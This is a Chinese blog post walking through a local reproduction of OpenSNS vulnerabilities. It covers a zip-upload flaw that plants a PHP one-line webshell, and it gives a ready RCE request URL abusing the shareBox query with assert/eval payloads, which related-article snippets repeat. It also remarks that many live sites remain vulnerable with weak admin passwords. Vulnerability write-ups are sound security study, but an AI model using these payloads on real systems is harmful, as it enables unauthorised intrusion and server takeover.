OpenSNS开源社交系统--文件上传渗透测试复现

最新推荐文章于 2023-08-01 11:27:55 发布
最新推荐文章于 2023-08-01 11:27:55 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 漏洞 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CNXBDSa/article/details/119798779
版权

前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现

源码信息:OpenSNS开源版

漏洞类型:后台getshell

下载地址:http://www.opensns.cn/home/index/download.html

(下载V5版本的,V6.2做了文件上传Mimn限制)

漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行

可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.html

漏洞原理

程序在上传zip文件时,自动对zip文件进行解压没有对解压出文件的内容进行过滤就直接写入硬盘。

代码审计过程学习中https://www.cnblogs.com/Spec/p/11142766.html

漏洞文件上传位置,可以上一个zip文件,里面放入的你一句话木马,然后系统直接对其解压在目录Theme里面,使用蚁剑连接在这里插入图片描述网上有很多站都是利用这个开源的系统,大部分已经修复,小部分还存在漏洞,存在远程RCE,后台还存在弱口令,可以直接进入

payload:index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang

也可以换成一句话木马@eval($_POST[Haaa])%26id[0]
在这里插入图片描述

可以直接通过蚁剑进行连接,但是中间有的站权限低,只能读取同一目录,不能去获取别的目录,不能进行命令执行,需要提权,借助蚁剑插件绕过disable_functions,但是我的蚁剑有点问题,不能进行提权,还在找原因。

https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/5

解决方案
对上传模板文件进行限制或禁止前台访问该目录。

(未完待续!!!!)

原文在这:https://xz.aliyun.com/t/9936参考

阿波次的鹅佛鸽
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞 || OpenSNS远程命令执行漏洞
失心少年
07-12 661
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令。
OpenSNS开源社交系统-PHP
06-21
<p>OpenSNS一款有“身份”的开源免费SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台,可以为客户快速...
Opensns 命令执行漏洞(CNVD-2021-34590)
小小猪的博客
12-29 3520
Opensns 命令执行漏洞(CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
opensns综合性社交软件系统存在远程命令执行高危漏洞
最新发布
weixin_68647219的博客
08-01 3473
opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox通过 get请求提交query参数存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令。
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 2949
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于入了一个数组。接下...
opensns 命令执行 (CNVD-2021-34590)漏洞
weixin_42675091的博客
09-23 1318
opensns 命令执行 (CNVD-2021-34590)漏洞
31:WEB漏洞-文件操作之文件包含漏洞全解
mingyqf的博客
04-03 1592
31:WEB漏洞-文件操作之文件包含漏洞全解 思维导图 知识点 文件包含漏洞``原理,检测,类型,利用,修等` `原理:将文件以脚本执行` `文件包含各个脚本代码``ASP,PHP,JSP,ASPXdeng``<!--#``include` `file=``"1.asp"` `-->``<!--#``include` `file=``"1.aspx"` `-->``<c:import url=``"http://thief.one/1.jsp"``>``<jsp
OpenSNS开源社交系统 v5.1.0
11-29
OpenSNS开源社交系统是一款专为构建具有身份特色的社交网络平台设计的软件系统。它集成了多种社交功能,包括微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、问答、分类信息以及微店等模块,旨在提供全...
OpenSNS开源社交系统 v6.2.0
08-18
OpenSNS开源社交系统 v6.2.0是一款专为构建社交网络平台设计的软件解决方案。这个系统的特点在于它提供了一整套丰富的功能模块,旨在帮助用户创建具有身份验证的多用途社交网络。以下是关于OpenSNS v6.2.0的一些详细...
OpenSNS开源社交系统 v3.0
12-05
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台,可以为客户快速搭建社交...
OpenSNS微社区 6.0.0.zip
05-27
OpenSNS微社区是一款综合性社交软件,您可以使用OpenSNS快速搭建一个类似新浪微博一样的功能强大的社交网站,您的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用,除此之外,OpenSNS还提供云市场进行功能扩展,大量的扩展让你的网站如虎添翼。OpenSNS微社区 6.0.0 更新日志:2018-09-11[修]原生支付配置;[修]伪静态下,论坛帖子翻页功能;[修]论坛用户权限限制功能;[优化]聚合首页活动栏的介绍显示字数。
OpenSNS开源社交系统 v5.7.0
10-14
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
RCE漏洞
qq_43757105的博客
09-14 931
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
opensns html5,记对OpenSNS的一次代码审计
weixin_29289821的博客
06-28 290
*本文中涉及到的相关漏洞已报送厂商并得到修,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。我在FreeBuf上每天都可以学到很多新思路新技术,感谢这个平台,为了回馈FreeBuf的小伙伴们,写下这篇文章,希望在可以为奋斗在网络安全路上的小伙伴们提供一些新奇小思路,其实挖洞并不难,也希望大家能把分享的精神发扬光大。概述OpenSNS是想天科技开发的一款综合性社交软件。您可以...
openSNS 使用关闭游客访问插件后注册头像无法上问题解决。
F_shan的博客
07-29 884
开源社交系统openSNS 市场中的关闭游客访问插件使用时会有一些bug出,今天发使用此插件后注册时头像无法上。排查后发是头像上调用了Core模块FileController.class中的uploadAvater方法,然而关闭游客访问插件默认设置中没有将Core模块忽略过滤,因此作为游客身份在注册时被禁止访问Core模块,图片及用户data无法递到方法中。 修正方法: 在./Ad
thinksns V3(开源微博系统) getshell 漏洞附利用方法
收集盒 Book box
05-16 1334
wooyun test的重测试是这程序 结果我申请没让我进 听朋友说是这个 我就大概看了下 就发个getshell 反正众测那么多黑客 肯定到时候有人挖出来 还不如放出来 attachaction.class.php   public function capture(){ error_reporting(0);
opensns账户写入问题
weixin_33834075的博客
09-28 191
涉及到的php文件 MemberController.class.php UcenterMemberModel.class.php /** * 注册一个新用户 * @param string $username 用户名 * @param string $nickname 昵称 * @param string $passw...
文件漏洞获取服务器,任意文件漏洞 getshell 教程
weixin_42366319的博客
08-06 1197
getshell这里通常是指获取webshell权限等这些。什么是webshell?webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。一、什么是 getshell?1、什么是shell?shell就是一个脚本文件,我们通过这个脚本文件来管理或者控制服务器的文件、数据库等信息。2、如何getshell?目的是将脚本文件到服务...
文件漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 2956
我相信,你在开发Web应用时,后端一定会提供文件的上功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上入口。但是,你在做文件功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
基于web的社团管理系统
04-24
好的,我明白了。您的第一个问题是:基于Web的社团管理系统。是吗? 对于这个问题,我可以告诉您,基于Web的社团管理系统是一种利用互联网和Web技术,为社团或组织提供管理平台的系统。这个系统通常包括成员管理、活动管理、组织内部沟通等功能。目前,有很多开源的社团管理系统,例如OpenSNS、PHPCMS等。如果您有特定的需求,可以根据需求选择适合的系统

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值